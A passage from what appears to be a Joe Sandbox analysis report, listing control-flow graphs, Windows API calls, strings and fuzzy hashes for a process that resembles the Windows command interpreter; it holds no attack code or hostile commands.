                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                    • Instruction ID: a0b1dbf19862fc0dc0d6f366625d7abf18a69a1cb73ae0af8fb55636af4e74ae
                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                    • Instruction Fuzzy Hash: F751FB21B08A8285EA34AF1599442BAE672FB54BB8FC45231DE6D076D4DF3CE44AC720

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 643 7ff719674d5c-7ff719674e4b InitializeCriticalSection call 7ff7196758e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff719670580 call 7ff719674a14 call 7ff719674ad0 call 7ff719675554 GetCommandLineW 654 7ff719674e4d-7ff719674e54 643->654 654->654 655 7ff719674e56-7ff719674e61 654->655 656 7ff719674e67-7ff719674e7b call 7ff719672e44 655->656 657 7ff7196751cf-7ff7196751e3 call 7ff719663278 call 7ff719674c1c 655->657 662 7ff7196751ba-7ff7196751ce call 7ff719663278 call 7ff719674c1c 656->662 663 7ff719674e81-7ff719674ec3 GetCommandLineW call 7ff7196713e0 call 7ff71966ca40 656->663 662->657 663->662 674 7ff719674ec9-7ff719674ee8 call 7ff71967417c call 7ff719672394 663->674 678 7ff719674eed-7ff719674ef5 674->678 678->678 679 7ff719674ef7-7ff719674f1f call 7ff71966aa54 678->679 682 7ff719674f95-7ff719674fee GetConsoleOutputCP GetCPInfo call 7ff7196751ec GetProcessHeap HeapAlloc 679->682 683 7ff719674f21-7ff719674f30 679->683 689 7ff719675012-7ff719675018 682->689 690 7ff719674ff0-7ff719675006 GetConsoleTitleW 682->690 683->682 684 7ff719674f32-7ff719674f39 683->684 684->682 686 7ff719674f3b-7ff719674f77 call 7ff719663278 GetWindowsDirectoryW 684->686 696 7ff719674f7d-7ff719674f90 call 7ff719673c24 686->696 697 7ff7196751b1-7ff7196751b9 call 7ff719674c1c 686->697 692 7ff71967507a-7ff71967507e 689->692 693 7ff71967501a-7ff719675024 call 7ff719673578 689->693 690->689 691 7ff719675008-7ff71967500f 690->691 691->689 698 7ff7196750eb-7ff719675161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff719675080-7ff7196750b3 call 7ff71968b89c call 7ff71966586c call 7ff719663240 call 7ff719673448 692->699 693->692 707 7ff719675026-7ff719675030 693->707 696->682 697->662 704 7ff719675163-7ff719675167 698->704 705 7ff71967516f 698->705 724 7ff7196750b5-7ff7196750d0 call 7ff719673448 * 2 699->724 725 7ff7196750d2-7ff7196750d7 call 7ff719663278 699->725 704->705 710 7ff719675169-7ff71967516d 704->710 706 7ff719675172-7ff7196751af free call 7ff719678f80 705->706 712 7ff719675075 call 7ff71968cff0 707->712 713 7ff719675032-7ff719675059 GetStdHandle GetConsoleScreenBufferInfo 707->713 710->705 710->706 712->692 717 7ff71967505b-7ff719675067 713->717 718 7ff719675069-7ff719675073 713->718 717->692 718->692 718->712 729 7ff7196750dc-7ff7196750e6 GlobalFree 724->729 725->729 729->698
                                                                    APIs
                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674D9A
                                                                      • Part of subcall function 00007FF7196758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71968C6DB), ref: 00007FF7196758EF
                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674DBB
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719674DCA
                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674DE0
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719674DEE
                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E04
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF719670589
                                                                      • Part of subcall function 00007FF719670580: SetConsoleMode.KERNELBASE ref: 00007FF71967059E
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF7196705AF
                                                                      • Part of subcall function 00007FF719670580: GetConsoleMode.KERNELBASE ref: 00007FF7196705C5
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF7196705EF
                                                                      • Part of subcall function 00007FF719670580: GetConsoleMode.KERNELBASE ref: 00007FF719670605
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF719670632
                                                                      • Part of subcall function 00007FF719670580: SetConsoleMode.KERNELBASE ref: 00007FF719670647
                                                                      • Part of subcall function 00007FF719674A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                      • Part of subcall function 00007FF719674A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                      • Part of subcall function 00007FF719674A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                      • Part of subcall function 00007FF719674A14: memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                      • Part of subcall function 00007FF719674A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                      • Part of subcall function 00007FF719674AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AD6
                                                                      • Part of subcall function 00007FF719674AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AEF
                                                                      • Part of subcall function 00007FF719675554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF719674E35), ref: 00007FF7196755DA
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675623
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675667
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF7196756BE
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675702
                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E35
                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E81
                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674F69
                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674F95
                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FB0
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FC1
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FD8
                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FF8
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675037
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967504B
                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7196750DF
                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7196750F2
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967510F
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675130
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967514A
                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675175
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                    • API String ID: 1049357271-3021193919
                                                                    • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                    • Instruction ID: 9dadb18147e0b99e8d1b9b08be2253f7024672ccf76fc94e22870046798407c8
                                                                    • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                    • Instruction Fuzzy Hash: 9AC14F21A08E428AEA04BF11A814179E6B2FF89BB9F859175D90E07795DF3CE54F8230

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 732 7ff719673c24-7ff719673c61 733 7ff71967ec5a-7ff71967ec5f 732->733 734 7ff719673c67-7ff719673c99 call 7ff71966af14 call 7ff71966ca40 732->734 733->734 736 7ff71967ec65-7ff71967ec6a 733->736 743 7ff71967ec97-7ff71967eca1 call 7ff71967855c 734->743 744 7ff719673c9f-7ff719673cb2 call 7ff71966b900 734->744 738 7ff71967412e-7ff71967415b call 7ff719678f80 736->738 744->743 749 7ff719673cb8-7ff719673cbc 744->749 750 7ff719673cbf-7ff719673cc7 749->750 750->750 751 7ff719673cc9-7ff719673ccd 750->751 752 7ff719673cd2-7ff719673cd8 751->752 753 7ff719673cda-7ff719673cdf 752->753 754 7ff719673ce5-7ff719673d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff719673faa-7ff719673fb3 753->755 756 7ff719673fb8 754->756 757 7ff719673d68-7ff719673d6c 754->757 755->752 759 7ff719673fc6-7ff719673fec GetLastError call 7ff71967855c call 7ff71967a5d6 756->759 757->756 758 7ff719673d72-7ff719673dcd towupper GetFullPathNameW 757->758 758->759 760 7ff719673dd3-7ff719673ddd 758->760 763 7ff719673ff1-7ff719674007 call 7ff71967855c _local_unwind 759->763 762 7ff719673de3-7ff719673dfb 760->762 760->763 765 7ff7196740fe-7ff719674119 call 7ff71967855c _local_unwind 762->765 766 7ff719673e01-7ff719673e11 762->766 773 7ff71967400c-7ff719674022 GetLastError 763->773 775 7ff71967411a-7ff71967412c call 7ff71966ff70 call 7ff71967855c 765->775 766->765 769 7ff719673e17-7ff719673e28 766->769 772 7ff719673e2c-7ff719673e34 769->772 772->772 776 7ff719673e36-7ff719673e3f 772->776 777 7ff719674028-7ff71967402b 773->777 778 7ff719673e95-7ff719673e9c 773->778 775->738 780 7ff719673e42-7ff719673e55 776->780 777->778 781 7ff719674031-7ff719674047 call 7ff71967855c _local_unwind 777->781 782 7ff719673e9e-7ff719673ec2 call 7ff719672978 778->782 783 7ff719673ecf-7ff719673ed3 778->783 787 7ff719673e57-7ff719673e60 780->787 788 7ff719673e66-7ff719673e8f GetFileAttributesW 780->788 799 7ff71967404c-7ff719674062 call 7ff71967855c _local_unwind 781->799 791 7ff719673ec7-7ff719673ec9 782->791 785 7ff719673f08-7ff719673f0b 783->785 786 7ff719673ed5-7ff719673ef7 GetFileAttributesW 783->786 795 7ff719673f0d-7ff719673f11 785->795 796 7ff719673f1e-7ff719673f40 SetCurrentDirectoryW 785->796 793 7ff719673efd-7ff719673f02 786->793 794 7ff719674067-7ff719674098 GetLastError call 7ff71967855c _local_unwind 786->794 787->788 797 7ff719673f9d-7ff719673fa5 787->797 788->773 788->778 791->783 791->799 793->785 802 7ff71967409d-7ff7196740b3 call 7ff71967855c _local_unwind 793->802 794->802 803 7ff719673f46-7ff719673f69 call 7ff71967498c 795->803 804 7ff719673f13-7ff719673f1c 795->804 796->803 805 7ff7196740b8-7ff7196740de GetLastError call 7ff71967855c _local_unwind 796->805 797->780 799->794 802->805 815 7ff7196740e3-7ff7196740f9 call 7ff71967855c _local_unwind 803->815 816 7ff719673f6f-7ff719673f98 call 7ff71967417c 803->816 804->796 804->803 805->815 815->765 816->775
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                    • String ID: :
                                                                    • API String ID: 1809961153-336475711
                                                                    • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                    • Instruction ID: c6645ddb4478333c0b0f09991b9babb289b0031e3f1bd3fee8f1b118faa7a636
                                                                    • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                    • Instruction Fuzzy Hash: E3D15E3260CF8581EA68AF15E4452B9F7B2FB857A8F844135DA4E436A4DF3CE54AC730

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 914 7ff719672394-7ff719672416 memset call 7ff71966ca40 917 7ff71967241c-7ff719672453 GetModuleFileNameW call 7ff71967081c 914->917 918 7ff71967e0d2-7ff71967e0da call 7ff719674c1c 914->918 923 7ff71967e0db-7ff71967e0ee call 7ff71967498c 917->923 924 7ff719672459-7ff719672468 call 7ff71967081c 917->924 918->923 930 7ff71967e0f4-7ff71967e107 call 7ff71967498c 923->930 929 7ff71967246e-7ff71967247d call 7ff71967081c 924->929 924->930 935 7ff719672516-7ff719672529 call 7ff71967498c 929->935 936 7ff719672483-7ff719672492 call 7ff71967081c 929->936 939 7ff71967e10d-7ff71967e123 930->939 935->936 936->939 947 7ff719672498-7ff7196724a7 call 7ff71967081c 936->947 940 7ff71967e125-7ff71967e139 wcschr 939->940 941 7ff71967e13f-7ff71967e17a _wcsupr 939->941 940->941 944 7ff71967e27c 940->944 945 7ff71967e17c-7ff71967e17f 941->945 946 7ff71967e181-7ff71967e199 wcsrchr 941->946 949 7ff71967e283-7ff71967e29b call 7ff71967498c 944->949 948 7ff71967e19c 945->948 946->948 956 7ff7196724ad-7ff7196724c5 call 7ff719673c24 947->956 957 7ff71967e2a1-7ff71967e2c3 _wcsicmp 947->957 951 7ff71967e1a0-7ff71967e1a7 948->951 949->957 951->951 954 7ff71967e1a9-7ff71967e1bb 951->954 958 7ff71967e264-7ff71967e277 call 7ff719671300 954->958 959 7ff71967e1c1-7ff71967e1e6 954->959 964 7ff7196724ca-7ff7196724db 956->964 958->944 962 7ff71967e21a 959->962 963 7ff71967e1e8-7ff71967e1f1 959->963 969 7ff71967e21d-7ff71967e21f 962->969 965 7ff71967e1f3-7ff71967e1f6 963->965 966 7ff71967e201-7ff71967e210 963->966 967 7ff7196724dd-7ff7196724e4 ??_V@YAXPEAX@Z 964->967 968 7ff7196724e9-7ff719672514 call 7ff719678f80 964->968 965->966 970 7ff71967e1f8-7ff71967e1ff 965->970 966->962 971 7ff71967e212-7ff71967e218 966->971 967->968 969->949 973 7ff71967e221-7ff71967e228 969->973 970->965 970->966 971->969 975 7ff71967e22a-7ff71967e231 973->975 976 7ff71967e254-7ff71967e262 973->976 977 7ff71967e234-7ff71967e237 975->977 976->944 977->976 978 7ff71967e239-7ff71967e242 977->978 978->976 979 7ff71967e244-7ff71967e252 978->979 979->976 979->977
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                    • API String ID: 2622545777-4197029667
                                                                    • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                    • Instruction ID: 742b9a3553a842a969c540a4ebd66363952600f2ee0d9740e501f5f706aba56d
                                                                    • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                    • Instruction Fuzzy Hash: 2F913F61B09E4285EE29AF50D8541B8A3B2FF44BA8FC44175C95E476A5DF3CE50EC330

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                    • String ID: CMD.EXE
                                                                    • API String ID: 1606018815-3025314500
                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                    • Instruction ID: 538b2497e3db7c0e25cfc2fc89b1895c7bf32ed122eaa9eac413fc96a4fa4bf2
                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                    • Instruction Fuzzy Hash: 2041CC35A09E02CBE6086F15E855578FBB2BB89B69FC99175C91E46360DF3CA40EC630

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 992 7ff71966c620-7ff71966c66f GetConsoleTitleW 993 7ff71966c675-7ff71966c687 call 7ff71966af14 992->993 994 7ff71967c5f2 992->994 999 7ff71966c68e-7ff71966c69d call 7ff71966ca40 993->999 1000 7ff71966c689 993->1000 996 7ff71967c5fc-7ff71967c60c GetLastError 994->996 998 7ff71967c5e3 call 7ff719663278 996->998 1004 7ff71967c5e8-7ff71967c5ed call 7ff71967855c 998->1004 999->1004 1006 7ff71966c6a3-7ff71966c6ac 999->1006 1000->999 1004->994 1007 7ff71966c954-7ff71966c95e call 7ff71967291c 1006->1007 1008 7ff71966c6b2-7ff71966c6c5 call 7ff71966b9c0 1006->1008 1013 7ff71967c5de-7ff71967c5e0 1007->1013 1014 7ff71966c964-7ff71966c972 call 7ff7196689c0 1007->1014 1015 7ff71966c6cb-7ff71966c6ce 1008->1015 1016 7ff71966c9b5-7ff71966c9b8 call 7ff719675c6c 1008->1016 1013->998 1014->996 1024 7ff71966c978-7ff71966c99a towupper 1014->1024 1015->1004 1018 7ff71966c6d4-7ff71966c6e9 1015->1018 1023 7ff71966c9bd-7ff71966c9c9 call 7ff71967855c 1016->1023 1021 7ff71967c616-7ff71967c620 call 7ff71967855c 1018->1021 1022 7ff71966c6ef-7ff71966c6fa 1018->1022 1025 7ff71967c627 1021->1025 1022->1025 1026 7ff71966c700-7ff71966c713 1022->1026 1039 7ff71966c9d0-7ff71966c9d7 1023->1039 1029 7ff71966c9a0-7ff71966c9a9 1024->1029 1031 7ff71967c631 1025->1031 1030 7ff71966c719-7ff71966c72c 1026->1030 1026->1031 1029->1029 1034 7ff71966c9ab-7ff71966c9af 1029->1034 1035 7ff71967c63b 1030->1035 1036 7ff71966c732-7ff71966c747 call 7ff71966d3f0 1030->1036 1031->1035 1034->1016 1037 7ff71967c60e-7ff71967c611 call 7ff71968ec14 1034->1037 1040 7ff71967c645 1035->1040 1045 7ff71966c74d-7ff71966c750 1036->1045 1046 7ff71966c8ac-7ff71966c8af 1036->1046 1037->1021 1043 7ff71966c9dd-7ff71967c6da SetConsoleTitleW 1039->1043 1044 7ff71966c872-7ff71966c8aa call 7ff71967855c call 7ff719678f80 1039->1044 1050 7ff71967c64e-7ff71967c651 1040->1050 1043->1044 1051 7ff71966c76a-7ff71966c76d 1045->1051 1052 7ff71966c752-7ff71966c764 call 7ff71966bd38 1045->1052 1046->1045 1049 7ff71966c8b5-7ff71966c8d3 wcsncmp 1046->1049 1049->1051 1056 7ff71966c8d9 1049->1056 1057 7ff71966c80d-7ff71966c811 1050->1057 1058 7ff71967c657-7ff71967c65b 1050->1058 1054 7ff71966c773-7ff71966c77a 1051->1054 1055 7ff71966c840-7ff71966c84b call 7ff71966cb40 1051->1055 1052->1004 1052->1051 1061 7ff71966c780-7ff71966c784 1054->1061 1076 7ff71966c84d-7ff71966c855 call 7ff71966cad4 1055->1076 1077 7ff71966c856-7ff71966c86c 1055->1077 1056->1045 1063 7ff71966c817-7ff71966c81b 1057->1063 1064 7ff71966c9e2-7ff71966c9e7 1057->1064 1058->1057 1067 7ff71966c83d 1061->1067 1068 7ff71966c78a-7ff71966c7a4 wcschr 1061->1068 1070 7ff71966ca1b-7ff71966ca1f 1063->1070 1071 7ff71966c821 1063->1071 1064->1063 1072 7ff71966c9ed-7ff71966c9f7 call 7ff71967291c 1064->1072 1067->1055 1074 7ff71966c8de-7ff71966c8f7 1068->1074 1075 7ff71966c7aa-7ff71966c7ad 1068->1075 1070->1071 1078 7ff71966ca25-7ff71967c6b3 call 7ff719663278 1070->1078 1079 7ff71966c824-7ff71966c82d 1071->1079 1086 7ff71966c9fd-7ff71966ca00 1072->1086 1087 7ff71967c684-7ff71967c698 call 7ff719663278 1072->1087 1082 7ff71966c900-7ff71966c908 1074->1082 1083 7ff71966c7b0-7ff71966c7b8 1075->1083 1076->1077 1077->1039 1077->1044 1078->1004 1079->1079 1080 7ff71966c82f-7ff71966c837 1079->1080 1080->1061 1080->1067 1082->1082 1088 7ff71966c90a-7ff71966c915 1082->1088 1083->1083 1089 7ff71966c7ba-7ff71966c7c7 1083->1089 1086->1063 1093 7ff71966ca06-7ff71966ca10 call 7ff7196689c0 1086->1093 1087->1004 1094 7ff71966c93a-7ff71966c944 1088->1094 1095 7ff71966c917 1088->1095 1089->1050 1096 7ff71966c7cd-7ff71966c7db 1089->1096 1093->1063 1111 7ff71966ca16-7ff71967c67f GetLastError call 7ff719663278 1093->1111 1103 7ff71966ca2a-7ff71966ca2f call 7ff719679158 1094->1103 1104 7ff71966c94a 1094->1104 1100 7ff71966c920-7ff71966c928 1095->1100 1101 7ff71966c7e0-7ff71966c7e7 1096->1101 1106 7ff71966c92a-7ff71966c92f 1100->1106 1107 7ff71966c932-7ff71966c938 1100->1107 1108 7ff71966c7e9-7ff71966c7f1 1101->1108 1109 7ff71966c800-7ff71966c803 1101->1109 1103->1013 1104->1007 1106->1107 1107->1094 1107->1100 1108->1109 1112 7ff71966c7f3-7ff71966c7fe 